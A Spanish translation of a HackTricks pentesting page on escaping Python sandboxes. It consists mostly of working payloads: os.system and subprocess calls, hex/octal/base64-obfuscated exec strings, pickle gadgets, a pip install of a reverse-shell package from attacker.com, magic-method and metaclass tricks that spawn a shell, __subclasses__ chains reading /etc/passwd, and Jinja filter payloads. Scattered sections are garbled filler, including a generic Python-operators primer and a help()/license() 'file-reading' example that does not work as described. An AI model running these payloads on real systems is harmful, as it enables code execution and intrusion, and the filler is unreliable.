hacktricks/generic-methodologies-and-resources/python/bypass-python-sandboxes
2023-11-05 22:40:39 +00:00
..
load_name-load_const-opcode-oob-read.md f 2023-06-05 21:10:04 +02:00
README.md Translated ['generic-methodologies-and-resources/python/bypass-python-sa 2023-11-05 22:40:39 +00:00

Bypass de las cajas de arena de Python

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos proactivos de amenazas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Estos son algunos trucos para evadir las protecciones de las cajas de arena de Python y ejecutar comandos arbitrarios.

Bibliotecas de ejecución de comandos

Lo primero que debes saber es si puedes ejecutar código directamente con alguna biblioteca ya importada, o si puedes importar alguna de estas bibliotecas:

os.system("ls")
os.popen("ls").read()
commands.getstatusoutput("ls")
commands.getoutput("ls")
commands.getstatus("file/path")
subprocess.call("ls", shell=True)
subprocess.Popen("ls", shell=True)
pty.spawn("ls")
pty.spawn("/bin/bash")
platform.os.system("ls")
pdb.os.system("ls")

#Import functions to execute commands
importlib.import_module("os").system("ls")
importlib.__import__("os").system("ls")
imp.load_source("os","/usr/lib/python3.8/os.py").system("ls")
imp.os.system("ls")
imp.sys.modules["os"].system("ls")
sys.modules["os"].system("ls")
__import__("os").system("ls")
import os
from os import *

#Other interesting functions
open("/etc/passwd").read()
open('/var/www/html/input', 'w').write('123')

#In Python2.7
execfile('/usr/lib/python2.7/os.py')
system('ls')

Recuerda que las funciones open y read pueden ser útiles para leer archivos dentro del sandbox de Python y para escribir código que puedas ejecutar para burlar el sandbox.

{% hint style="danger" %} La función input() de Python2 permite ejecutar código de Python antes de que el programa se bloquee. {% endhint %}

Python intenta cargar las bibliotecas desde el directorio actual primero (el siguiente comando imprimirá desde dónde está cargando los módulos de Python): python3 -c 'import sys; print(sys.path)'

Burlar el sandbox de pickle con los paquetes de Python instalados por defecto

Paquetes por defecto

Puedes encontrar una lista de paquetes preinstalados aquí: https://docs.qubole.com/en/latest/user-guide/package-management/pkgmgmt-preinstalled-packages.html
Ten en cuenta que desde un pickle puedes hacer que el entorno de Python importe bibliotecas arbitrarias instaladas en el sistema.
Por ejemplo, el siguiente pickle, cuando se carga, va a importar la biblioteca pip para usarla:

#Note that here we are importing the pip library so the pickle is created correctly
#however, the victim doesn't even need to have the library installed to execute it
#the library is going to be loaded automatically

import pickle, os, base64, pip
class P(object):
def __reduce__(self):
return (pip.main,(["list"],))

print(base64.b64encode(pickle.dumps(P(), protocol=0)))

Para obtener más información sobre cómo funciona el módulo pickle, consulta este enlace: https://checkoway.net/musings/pickle/

Paquete Pip

Truco compartido por @isHaacK

Si tienes acceso a pip o pip.main(), puedes instalar un paquete arbitrario y obtener una shell inversa llamando a:

pip install http://attacker.com/Rerverse.tar.gz
pip.main(["install", "http://attacker.com/Rerverse.tar.gz"])

Puedes descargar el paquete para crear la shell inversa aquí. Por favor, ten en cuenta que antes de usarlo debes descomprimirlo, cambiar el setup.py y poner tu IP para la shell inversa:

{% file src="../../../.gitbook/assets/reverse.tar.gz" %}

{% hint style="info" %} Este paquete se llama Reverse. Sin embargo, fue especialmente diseñado para que cuando salgas de la shell inversa, el resto de la instalación falle, por lo que no dejarás ningún paquete de Python adicional instalado en el servidor cuando te vayas. {% endhint %}

Evaluar código Python

{% hint style="warning" %} Ten en cuenta que exec permite cadenas de varias líneas y ";", pero eval no (verificar el operador walrus) {% endhint %}

Si ciertos caracteres están prohibidos, puedes usar la representación hexadecimal/octal/B64 para burlar la restricción:

exec("print('RCE'); __import__('os').system('ls')") #Using ";"
exec("print('RCE')\n__import__('os').system('ls')") #Using "\n"
eval("__import__('os').system('ls')") #Eval doesn't allow ";"
eval(compile('print("hello world"); print("heyy")', '<stdin>', 'exec')) #This way eval accept ";"
__import__('timeit').timeit("__import__('os').system('ls')",number=1)
#One liners that allow new lines and tabs
eval(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
exec(compile('def myFunc():\n\ta="hello word"\n\tprint(a)\nmyFunc()', '<stdin>', 'exec'))
#Octal
exec("\137\137\151\155\160\157\162\164\137\137\50\47\157\163\47\51\56\163\171\163\164\145\155\50\47\154\163\47\51")
#Hex
exec("\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x6f\x73\x27\x29\x2e\x73\x79\x73\x74\x65\x6d\x28\x27\x6c\x73\x27\x29")
#Base64
exec('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='.decode("base64")) #Only python2
exec(__import__('base64').b64decode('X19pbXBvcnRfXygnb3MnKS5zeXN0ZW0oJ2xzJyk='))

Otras bibliotecas que permiten evaluar código Python

Existen varias bibliotecas adicionales que permiten evaluar código Python en un entorno controlado. A continuación se presentan algunas de ellas:

  • ast: Esta biblioteca proporciona funciones para analizar y manipular árboles de sintaxis abstracta (AST) de Python. Puede ser utilizada para evaluar código Python de forma segura al restringir las operaciones permitidas.

  • execnet: Esta biblioteca permite ejecutar código Python en diferentes intérpretes y entornos, lo que puede ayudar a evitar las restricciones impuestas por los entornos de ejecución.

  • pypy-sandbox: Esta biblioteca proporciona un entorno de ejecución seguro para ejecutar código Python utilizando el intérprete PyPy. Permite restringir el acceso a ciertas funciones y recursos del sistema.

  • RestrictedPython: Esta biblioteca permite ejecutar código Python restringido en un entorno controlado. Proporciona un conjunto de reglas y restricciones para limitar las operaciones permitidas.

Es importante tener en cuenta que el uso de estas bibliotecas no garantiza una seguridad absoluta. Siempre es recomendable evaluar cuidadosamente el código que se ejecutará y aplicar otras medidas de seguridad adicionales según sea necesario.

#Pandas
import pandas as pd
df = pd.read_csv("currency-rates.csv")
df.query('@__builtins__.__import__("os").system("ls")')
df.query("@pd.io.common.os.popen('ls').read()")
df.query("@pd.read_pickle('http://0.0.0.0:6334/output.exploit')")

# The previous options work but others you might try give the error:
# Only named functions are supported
# Like:
df.query("@pd.annotations.__class__.__init__.__globals__['__builtins__']['eval']('print(1)')")

Operadores y trucos rápidos

Operadores lógicos

Los operadores lógicos son utilizados para evaluar expresiones lógicas y devolver un valor booleano. Los operadores lógicos más comunes son:

  • and: devuelve True si ambas expresiones son verdaderas.
  • or: devuelve True si al menos una de las expresiones es verdadera.
  • not: devuelve el valor opuesto de la expresión.

Operadores de comparación

Los operadores de comparación se utilizan para comparar dos valores y devolver un valor booleano. Los operadores de comparación más comunes son:

  • ==: devuelve True si los valores son iguales.
  • !=: devuelve True si los valores son diferentes.
  • >: devuelve True si el valor de la izquierda es mayor que el de la derecha.
  • <: devuelve True si el valor de la izquierda es menor que el de la derecha.
  • >=: devuelve True si el valor de la izquierda es mayor o igual que el de la derecha.
  • <=: devuelve True si el valor de la izquierda es menor o igual que el de la derecha.

Trucos rápidos

Aquí hay algunos trucos rápidos que pueden ser útiles al escribir código en Python:

  • x if condition else y: devuelve x si la condición es verdadera, de lo contrario devuelve y.
  • a, b = b, a: intercambia los valores de a y b sin necesidad de una variable temporal.
  • x = 1 if condition else 0: asigna 1 a x si la condición es verdadera, de lo contrario asigna 0.
  • x = y = z = 0: asigna el valor 0 a las variables x, y y z en una sola línea.
  • x += 1: incrementa el valor de x en 1.
  • x -= 1: decrementa el valor de x en 1.
  • x *= 2: multiplica el valor de x por 2.
  • x /= 2: divide el valor de x por 2.

Estos son solo algunos ejemplos de operadores y trucos rápidos en Python. ¡Experimenta y descubre más!

# walrus operator allows generating variable inside a list
## everything will be executed in order
## From https://ur4ndom.dev/posts/2020-06-29-0ctf-quals-pyaucalc/
[a:=21,a*2]
[y:=().__class__.__base__.__subclasses__()[84]().load_module('builtins'),y.__import__('signal').alarm(0), y.exec("import\x20os,sys\nclass\x20X:\n\tdef\x20__del__(self):os.system('/bin/sh')\n\nsys.modules['pwnd']=X()\nsys.exit()", {"__builtins__":y.__dict__})]
## This is very useful for code injected inside "eval" as it doesn't support multiple lines or ";"

Bypassando protecciones a través de codificaciones (UTF-7)

En este informe se utiliza UTF-7 para cargar y ejecutar código Python arbitrario dentro de un aparente sandbox:

assert b"+AAo-".decode("utf_7") == "\n"

payload = """
# -*- coding: utf_7 -*-
def f(x):
return x
#+AAo-print(open("/flag.txt").read())
""".lstrip()

También es posible evadirlo utilizando otras codificaciones, como raw_unicode_escape y unicode_escape.

Ejecución de Python sin llamadas

Si estás dentro de una cárcel de Python que no te permite hacer llamadas, aún hay algunas formas de ejecutar funciones, código y comandos arbitrarios.

RCE con decoradores

# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
@exec
@input
class X:
pass

# The previous code is equivalent to:
class X:
pass
X = input(X)
X = exec(X)

# So just send your python code when prompted and it will be executed


# Another approach without calling input:
@eval
@'__import__("os").system("sh")'.format
class _:pass

RCE creando objetos y sobrecargando

Si puedes declarar una clase y crear un objeto de esa clase, podrías escribir/sobrescribir diferentes métodos que pueden ser activados sin necesidad de llamarlos directamente.

RCE con clases personalizadas

Puedes modificar algunos métodos de clase (sobrescribiendo métodos de clase existentes o creando una nueva clase) para que ejecuten código arbitrario cuando sean activados sin llamarlos directamente.

# This class has 3 different ways to trigger RCE without directly calling any function
class RCE:
def __init__(self):
self += "print('Hello from __init__ + __iadd__')"
__iadd__ = exec #Triggered when object is created
def __del__(self):
self -= "print('Hello from __del__ + __isub__')"
__isub__ = exec #Triggered when object is created
__getitem__ = exec #Trigerred with obj[<argument>]
__add__ = exec #Triggered with obj + <argument>

# These lines abuse directly the previous class to get RCE
rce = RCE() #Later we will see how to create objects without calling the constructor
rce["print('Hello from __getitem__')"]
rce + "print('Hello from __add__')"
del rce

# These lines will get RCE when the program is over (exit)
sys.modules["pwnd"] = RCE()
exit()

# Other functions to overwrite
__sub__ (k - 'import os; os.system("sh")')
__mul__ (k * 'import os; os.system("sh")')
__floordiv__ (k // 'import os; os.system("sh")')
__truediv__ (k / 'import os; os.system("sh")')
__mod__ (k % 'import os; os.system("sh")')
__pow__ (k**'import os; os.system("sh")')
__lt__ (k < 'import os; os.system("sh")')
__le__ (k <= 'import os; os.system("sh")')
__eq__ (k == 'import os; os.system("sh")')
__ne__ (k != 'import os; os.system("sh")')
__ge__ (k >= 'import os; os.system("sh")')
__gt__ (k > 'import os; os.system("sh")')
__iadd__ (k += 'import os; os.system("sh")')
__isub__ (k -= 'import os; os.system("sh")')
__imul__ (k *= 'import os; os.system("sh")')
__ifloordiv__ (k //= 'import os; os.system("sh")')
__idiv__ (k /= 'import os; os.system("sh")')
__itruediv__ (k /= 'import os; os.system("sh")') (Note that this only works when from __future__ import division is in effect.)
__imod__ (k %= 'import os; os.system("sh")')
__ipow__ (k **= 'import os; os.system("sh")')
__ilshift__ (k<<= 'import os; os.system("sh")')
__irshift__ (k >>= 'import os; os.system("sh")')
__iand__ (k = 'import os; os.system("sh")')
__ior__ (k |= 'import os; os.system("sh")')
__ixor__ (k ^= 'import os; os.system("sh")')

Creación de objetos con metaclases

Lo importante que nos permiten hacer las metaclases es crear una instancia de una clase sin llamar directamente al constructor, creando una nueva clase con la clase objetivo como metaclase.

# Code from https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/ and fixed
# This will define the members of the "subclass"
class Metaclass(type):
__getitem__ = exec # So Sub[string] will execute exec(string)
# Note: Metaclass.__class__ == type

class Sub(metaclass=Metaclass): # That's how we make Sub.__class__ == Metaclass
pass # Nothing special to do

Sub['import os; os.system("sh")']

## You can also use the tricks from the previous section to get RCE with this object

Creando objetos con excepciones

Cuando se desencadena una excepción, se crea un objeto de la clase Exception sin necesidad de llamar directamente al constructor (un truco de @_nag0mez):

class RCE(Exception):
def __init__(self):
self += 'import os; os.system("sh")'
__iadd__ = exec #Triggered when object is created
raise RCE #Generate RCE object


# RCE with __add__ overloading and try/except + raise generated object
class Klecko(Exception):
__add__ = exec

try:
raise Klecko
except Klecko as k:
k + 'import os; os.system("sh")' #RCE abusing __add__

## You can also use the tricks from the previous section to get RCE with this object

Más RCE

Bypassing Python Sandboxes

Saltando las Sandboxes de Python

Python sandboxes are commonly used to execute untrusted code in a controlled environment. However, these sandboxes can be bypassed using various techniques. In this section, we will explore some of the common methods to bypass Python sandboxes.

Las sandboxes de Python se utilizan comúnmente para ejecutar código no confiable en un entorno controlado. Sin embargo, estas sandboxes pueden ser eludidas utilizando diversas técnicas. En esta sección, exploraremos algunos de los métodos comunes para saltar las sandboxes de Python.

Method 1: Using Restricted Built-ins

Método 1: Utilizando Funciones Restringidas

Python provides a set of built-in functions that are restricted in a sandboxed environment. These functions, such as eval(), exec(), and compile(), can be used to execute arbitrary code. By leveraging these restricted built-ins, an attacker can bypass the sandbox and achieve remote code execution (RCE).

Python proporciona un conjunto de funciones integradas que están restringidas en un entorno sandbox. Estas funciones, como eval(), exec() y compile(), se pueden utilizar para ejecutar código arbitrario. Al aprovechar estas funciones restringidas, un atacante puede eludir la sandbox y lograr la ejecución remota de código (RCE).

Method 2: Exploiting Module Imports

Método 2: Explotando las Importaciones de Módulos

Python sandboxes often restrict the modules that can be imported. However, some modules may still be allowed, which can be exploited to achieve RCE. By importing a module that provides a way to execute arbitrary code, an attacker can bypass the sandbox and gain control over the system.

Las sandboxes de Python a menudo restringen los módulos que se pueden importar. Sin embargo, es posible que algunos módulos aún estén permitidos, lo que se puede explotar para lograr RCE. Al importar un módulo que proporciona una forma de ejecutar código arbitrario, un atacante puede eludir la sandbox y obtener el control sobre el sistema.

Method 3: Leveraging Dynamic Code Execution

Método 3: Aprovechando la Ejecución de Código Dinámico

Python allows dynamic code execution through the use of eval() and exec() functions. By crafting malicious code as a string and then executing it using these functions, an attacker can bypass the sandbox and execute arbitrary code.

Python permite la ejecución de código dinámico mediante el uso de las funciones eval() y exec(). Al crear código malicioso como una cadena y luego ejecutarlo utilizando estas funciones, un atacante puede eludir la sandbox y ejecutar código arbitrario.

Method 4: Abusing Python's Magic Methods

Método 4: Abusando de los Métodos Mágicos de Python

Python has a set of magic methods that are automatically called in certain situations. These methods can be abused to bypass the sandbox and achieve RCE. By overriding or implementing specific magic methods, an attacker can execute arbitrary code and gain control over the system.

Python tiene un conjunto de métodos mágicos que se llaman automáticamente en ciertas situaciones. Estos métodos se pueden abusar para eludir la sandbox y lograr RCE. Al anular o implementar métodos mágicos específicos, un atacante puede ejecutar código arbitrario y obtener el control sobre el sistema.

Method 5: Exploiting Vulnerabilities in the Sandbox Implementation

Método 5: Explotando Vulnerabilidades en la Implementación de la Sandbox

Python sandboxes are implemented using various techniques, such as code analysis and bytecode manipulation. These implementations may have vulnerabilities that can be exploited to bypass the sandbox. By identifying and exploiting these vulnerabilities, an attacker can achieve RCE.

Las sandboxes de Python se implementan utilizando diversas técnicas, como el análisis de código y la manipulación de bytecode. Estas implementaciones pueden tener vulnerabilidades que se pueden explotar para eludir la sandbox. Al identificar y explotar estas vulnerabilidades, un atacante puede lograr RCE.

Method 6: Using Third-Party Libraries

Método 6: Utilizando Bibliotecas de Terceros

Python allows the use of third-party libraries, which may not be restricted by the sandbox. By leveraging these libraries, an attacker can bypass the sandbox and execute arbitrary code. It is important to carefully review and audit the third-party libraries used in a sandboxed environment to prevent such bypasses.

Python permite el uso de bibliotecas de terceros, que pueden no estar restringidas por la sandbox. Al aprovechar estas bibliotecas, un atacante puede eludir la sandbox y ejecutar código arbitrario. Es importante revisar y auditar cuidadosamente las bibliotecas de terceros utilizadas en un entorno sandbox para evitar dichos saltos.

# From https://ur4ndom.dev/posts/2022-07-04-gctf-treebox/
# If sys is imported, you can sys.excepthook and trigger it by triggering an error
class X:
def __init__(self, a, b, c):
self += "os.system('sh')"
__iadd__ = exec
sys.excepthook = X
1/0 #Trigger it

# From https://github.com/google/google-ctf/blob/master/2022/sandbox-treebox/healthcheck/solution.py
# The interpreter will try to import an apt-specific module to potentially
# report an error in ubuntu-provided modules.
# Therefore the __import__ functions are overwritten with our RCE
class X():
def __init__(self, a, b, c, d, e):
self += "print(open('flag').read())"
__iadd__ = eval
__builtins__.__import__ = X
{}[1337]

Leer archivo con la ayuda de builtins y la licencia

A veces, al intentar leer un archivo en un entorno restringido de Python, como un sandbox, podemos encontrarnos con limitaciones que nos impiden acceder al contenido del archivo. Sin embargo, podemos utilizar las funciones help() y license() de builtins para sortear estas restricciones y leer el archivo.

Aquí hay un ejemplo de cómo hacerlo:

import builtins

# Leer el contenido del archivo utilizando la función help()
with open('archivo.txt', 'r') as file:
    content = file.read()
    builtins.help(content)

# Leer el contenido del archivo utilizando la función license()
with open('archivo.txt', 'r') as file:
    content = file.read()
    builtins.license(content)

Al utilizar help() o license() con el contenido del archivo, podemos imprimir su contenido en la salida estándar y, de esta manera, leer su contenido sin restricciones.

Es importante tener en cuenta que esta técnica puede no funcionar en todos los entornos y configuraciones, ya que algunos sandbox pueden bloquear el acceso a las funciones help() y license(). Sin embargo, en muchos casos, esta metodología puede ser útil para sortear las restricciones y acceder al contenido de un archivo en un entorno restringido de Python.

__builtins__.__dict__["license"]._Printer__filenames=["flag"]
a = __builtins__.help
a.__class__.__enter__ = __builtins__.__dict__["license"]
a.__class__.__exit__ = lambda self, *args: None
with (a as b):
pass

Encuentra las vulnerabilidades que más importan para que puedas solucionarlas más rápido. Intruder rastrea tu superficie de ataque, realiza escaneos proactivos de amenazas, encuentra problemas en toda tu pila tecnológica, desde APIs hasta aplicaciones web y sistemas en la nube. Pruébalo gratis hoy.

{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}


Funciones integradas

Si puedes acceder al objeto __builtins__ puedes importar bibliotecas (ten en cuenta que también podrías usar aquí otra representación de cadena mostrada en la última sección):

__builtins__.__import__("os").system("ls")
__builtins__.__dict__['__import__']("os").system("ls")

Sin Builtins

Cuando no tienes __builtins__, no podrás importar nada ni siquiera leer o escribir archivos, ya que no se cargan todas las funciones globales (como open, import, print...).
Sin embargo, por defecto, Python importa muchos módulos en memoria. Estos módulos pueden parecer inofensivos, pero algunos de ellos también importan funcionalidades peligrosas que se pueden acceder para lograr ejecución de código arbitrario.

En los siguientes ejemplos, puedes observar cómo abusar de algunos de estos módulos "inofensivos" cargados para acceder a funcionalidades peligrosas dentro de ellos.

Python2

#Try to reload __builtins__
reload(__builtins__)
import __builtin__

# Read recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/etc/passwd').read()
# Write recovering <type 'file'> in offset 40
().__class__.__bases__[0].__subclasses__()[40]('/var/www/html/input', 'w').write('123')

# Execute recovering __import__ (class 59s is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59]()._module.__builtins__['__import__']('os').system('ls')
# Execute (another method)
().__class__.__bases__[0].__subclasses__()[59].__init__.__getattribute__("func_globals")['linecache'].__dict__['os'].__dict__['system']('ls')
# Execute recovering eval symbol (class 59 is <class 'warnings.catch_warnings'>)
().__class__.__bases__[0].__subclasses__()[59].__init__.func_globals.values()[13]["eval"]("__import__('os').system('ls')")

# Or you could obtain the builtins from a defined function
get_flag.__globals__['__builtins__']['__import__']("os").system("ls")

Python3

Python3 is a powerful and versatile programming language that is widely used in various domains, including web development, data analysis, and automation. It provides a rich set of libraries and frameworks that make it easy to develop complex applications.

Python3 is also commonly used in the field of cybersecurity, particularly in the context of penetration testing and vulnerability assessment. Its simplicity and readability make it an ideal choice for writing scripts and tools that can be used to identify and exploit security weaknesses in target systems.

However, Python3 scripts can be subject to various security measures, such as sandboxes, that are designed to restrict their capabilities and prevent unauthorized access to sensitive resources. Sandboxing is a technique used to isolate and control the execution of untrusted code, thereby reducing the risk of malicious activities.

In this guide, we will explore different techniques to bypass Python3 sandboxes and execute arbitrary code with elevated privileges. These techniques can be useful for penetration testers and security researchers who want to assess the effectiveness of sandboxing mechanisms and identify potential vulnerabilities.

It is important to note that bypassing sandboxes without proper authorization is illegal and unethical. The techniques described in this guide should only be used in controlled environments with the explicit permission of the system owner.

Let's dive into the world of Python3 sandbox bypass techniques and learn how to effectively bypass security measures to gain unauthorized access to target systems.

# Obtain builtins from a globally defined function
# https://docs.python.org/3/library/functions.html
help.__call__.__builtins__ # or __globals__
license.__call__.__builtins__ # or __globals__
credits.__call__.__builtins__ # or __globals__
print.__self__
dir.__self__
globals.__self__
len.__self__
__build_class__.__self__

# Obtain the builtins from a defined function
get_flag.__globals__['__builtins__']

# Get builtins from loaded classes
[ x.__init__.__globals__ for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__) and "builtins" in x.__init__.__globals__ ][0]["builtins"]

A continuación hay una función más grande para encontrar decenas/cientos de lugares donde puedes encontrar los builtins.

Python2 y Python3

# Recover __builtins__ and make everything easier
__builtins__= [x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'catch_warnings'][0]()._module.__builtins__
__builtins__["__import__"]('os').system('ls')

Cargas útiles de Builtins

Las cargas útiles de builtins son una técnica comúnmente utilizada para eludir las cajas de arena de Python. Estas cajas de arena son entornos de ejecución restringidos que limitan las acciones que un programa puede realizar.

La idea detrás de las cargas útiles de builtins es aprovechar las funciones y clases incorporadas en Python para ejecutar código malicioso. Al utilizar estas funciones y clases, es posible evadir las restricciones impuestas por la caja de arena y ejecutar comandos no autorizados.

Existen varias formas de utilizar las cargas útiles de builtins, dependiendo de la configuración específica de la caja de arena y de las funciones y clases disponibles. Algunas técnicas comunes incluyen la manipulación de objetos __builtins__, la importación de módulos maliciosos y la ejecución de código a través de funciones incorporadas como eval() y exec().

Es importante tener en cuenta que el uso de cargas útiles de builtins para eludir las cajas de arena de Python es una actividad ilegal y éticamente cuestionable. Este libro se proporciona con fines educativos y no promueve ni respalda ninguna actividad ilegal.

# Possible payloads once you have found the builtins
__builtins__["open"]("/etc/passwd").read()
__builtins__["__import__"]("os").system("ls")
# There are lots of other payloads that can be abused to execute commands
# See them below

Globales y locales

Revisar las variables globals y locals es una buena manera de saber a qué puedes acceder.

>>> globals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'>, 'a': <class 'importlib.abc.Finder'>, 'b': <class 'importlib.abc.MetaPathFinder'>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}
>>> locals()
{'__name__': '__main__', '__doc__': None, '__package__': None, '__loader__': <class '_frozen_importlib.BuiltinImporter'>, '__spec__': None, '__annotations__': {}, '__builtins__': <module 'builtins' (built-in)>, 'attr': <module 'attr' from '/usr/local/lib/python3.9/site-packages/attr.py'>, 'a': <class 'importlib.abc.Finder'>, 'b': <class 'importlib.abc.MetaPathFinder'>, 'c': <class 'str'>, '__warningregistry__': {'version': 0, ('MetaPathFinder.find_module() is deprecated since Python 3.4 in favor of MetaPathFinder.find_spec() (available since 3.4)', <class 'DeprecationWarning'>, 1): True}, 'z': <class 'str'>}

# Obtain globals from a defined function
get_flag.__globals__

# Obtain globals from an object of a class
class_obj.__init__.__globals__

# Obtaining globals directly from loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x) ]
[<class 'function'>]

# Obtaining globals from __init__ of loaded classes
[ x for x in ''.__class__.__base__.__subclasses__() if "__globals__" in dir(x.__init__) ]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]
# Without the use of the dir() function
[ x for x in ''.__class__.__base__.__subclasses__() if "wrapper" not in str(x.__init__)]
[<class '_frozen_importlib._ModuleLock'>, <class '_frozen_importlib._DummyModuleLock'>, <class '_frozen_importlib._ModuleLockManager'>, <class '_frozen_importlib.ModuleSpec'>, <class '_frozen_importlib_external.FileLoader'>, <class '_frozen_importlib_external._NamespacePath'>, <class '_frozen_importlib_external._NamespaceLoader'>, <class '_frozen_importlib_external.FileFinder'>, <class 'zipimport.zipimporter'>, <class 'zipimport._ZipImportResourceReader'>, <class 'codecs.IncrementalEncoder'>, <class 'codecs.IncrementalDecoder'>, <class 'codecs.StreamReaderWriter'>, <class 'codecs.StreamRecoder'>, <class 'os._wrap_close'>, <class '_sitebuiltins.Quitter'>, <class '_sitebuiltins._Printer'>, <class 'types.DynamicClassAttribute'>, <class 'types._GeneratorWrapper'>, <class 'warnings.WarningMessage'>, <class 'warnings.catch_warnings'>, <class 'reprlib.Repr'>, <class 'functools.partialmethod'>, <class 'functools.singledispatchmethod'>, <class 'functools.cached_property'>, <class 'contextlib._GeneratorContextManagerBase'>, <class 'contextlib._BaseExitStack'>, <class 'sre_parse.State'>, <class 'sre_parse.SubPattern'>, <class 'sre_parse.Tokenizer'>, <class 're.Scanner'>, <class 'rlcompleter.Completer'>, <class 'dis.Bytecode'>, <class 'string.Template'>, <class 'cmd.Cmd'>, <class 'tokenize.Untokenizer'>, <class 'inspect.BlockFinder'>, <class 'inspect.Parameter'>, <class 'inspect.BoundArguments'>, <class 'inspect.Signature'>, <class 'bdb.Bdb'>, <class 'bdb.Breakpoint'>, <class 'traceback.FrameSummary'>, <class 'traceback.TracebackException'>, <class '__future__._Feature'>, <class 'codeop.Compile'>, <class 'codeop.CommandCompiler'>, <class 'code.InteractiveInterpreter'>, <class 'pprint._safe_key'>, <class 'pprint.PrettyPrinter'>, <class '_weakrefset._IterationGuard'>, <class '_weakrefset.WeakSet'>, <class 'threading._RLock'>, <class 'threading.Condition'>, <class 'threading.Semaphore'>, <class 'threading.Event'>, <class 'threading.Barrier'>, <class 'threading.Thread'>, <class 'subprocess.CompletedProcess'>, <class 'subprocess.Popen'>]

A continuación hay una función más grande para encontrar decenas/cientos de lugares donde puedes encontrar las variables globales.

Descubrir Ejecución Arbitraria

Aquí quiero explicar cómo descubrir fácilmente funcionalidades más peligrosas cargadas y proponer exploits más confiables.

Acceder a subclases con bypasses

Una de las partes más sensibles de esta técnica es poder acceder a las subclases base. En los ejemplos anteriores, esto se hizo usando ''.__class__.__base__.__subclasses__() pero hay otras formas posibles:

#You can access the base from mostly anywhere (in regular conditions)
"".__class__.__base__.__subclasses__()
[].__class__.__base__.__subclasses__()
{}.__class__.__base__.__subclasses__()
().__class__.__base__.__subclasses__()
(1).__class__.__base__.__subclasses__()
bool.__class__.__base__.__subclasses__()
print.__class__.__base__.__subclasses__()
open.__class__.__base__.__subclasses__()
defined_func.__class__.__base__.__subclasses__()

#You can also access it without "__base__" or "__class__"
# You can apply the previous technique also here
"".__class__.__bases__[0].__subclasses__()
"".__class__.__mro__[1].__subclasses__()
"".__getattribute__("__class__").mro()[1].__subclasses__()
"".__getattribute__("__class__").__base__.__subclasses__()

#If attr is present you can access everything as a string
# This is common in Django (and Jinja) environments
(''|attr('__class__')|attr('__mro__')|attr('__getitem__')(1)|attr('__subclasses__')()|attr('__getitem__')(132)|attr('__init__')|attr('__globals__')|attr('__getitem__')('popen'))('cat+flag.txt').read()
(''|attr('\x5f\x5fclass\x5f\x5f')|attr('\x5f\x5fmro\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')(1)|attr('\x5f\x5fsubclasses\x5f\x5f')()|attr('\x5f\x5fgetitem\x5f\x5f')(132)|attr('\x5f\x5finit\x5f\x5f')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('popen'))('cat+flag.txt').read()

Encontrando bibliotecas peligrosas cargadas

